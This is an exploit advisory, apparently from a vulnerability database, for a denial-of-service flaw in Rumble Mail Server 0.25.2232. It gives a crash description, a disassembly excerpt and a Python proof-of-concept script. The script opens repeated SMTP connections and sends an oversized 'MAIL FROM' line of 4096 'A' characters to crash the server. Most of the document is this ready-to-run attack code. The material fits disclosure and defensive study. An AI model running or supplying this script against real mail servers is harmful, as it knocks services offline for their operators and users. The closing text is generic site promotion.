# ------------------------------------------------------------------------
# Software................Rumble 0.25.2232
# Vulnerability...........Denial Of Service
# Threat Level............Serious (3/5)
# Download................http://humbedooh.users.sourceforge.net/
# Discovery Date..........3/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <[email protected]>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A denial of service vulnerability can be exploited to crash Rumble
# Mail Server v0.25.2231.
#
# rumble_win32.exe: The instruction at 0x96CEEB referenced memory at
# 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)
#
# Disassembly:
#
# .text:0096CEEB mov edx, [ecx+8]
# .text:0096CEEE mov [ebp-8], edx
# .text:0096CEF1 mov eax, [ebp-8]
# .text:0096CEF4 mov ecx, [eax]
# .text:0096CEF6 mov [ebp-0Ch], ecx
# .text:0096CEF9 mov edx, [ebp+0Ch]
# .text:0096CEFC mov [ebp-10h], edx
# .text:0096CEFF
# .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31
# .text:0096CEFF mov eax, [ebp-10h]
# .text:0096CF02 mov cl, [eax]
# .text:0096CF04 mov [ebp-11h], cl
# .text:0096CF07 mov edx, [ebp-0Ch]
# .text:0096CF0A cmp cl, [edx]
# .text:0096CF0C jnz short loc_96CF3C
#
#
# --PoC--
import socket
host = 'localhost'
tld = 'mydomain.tld'
port = 25
def crash():
for i in range(0, 16):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(32)
junk = 'A' * 4096
print s.recv(8192)
s.send('HELO ' + tld + '\r\n')
print s.recv(8192)
s.send('MAIL FROM ' + junk + '\r\n')
print s.recv(8192)
s.close()
crash()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation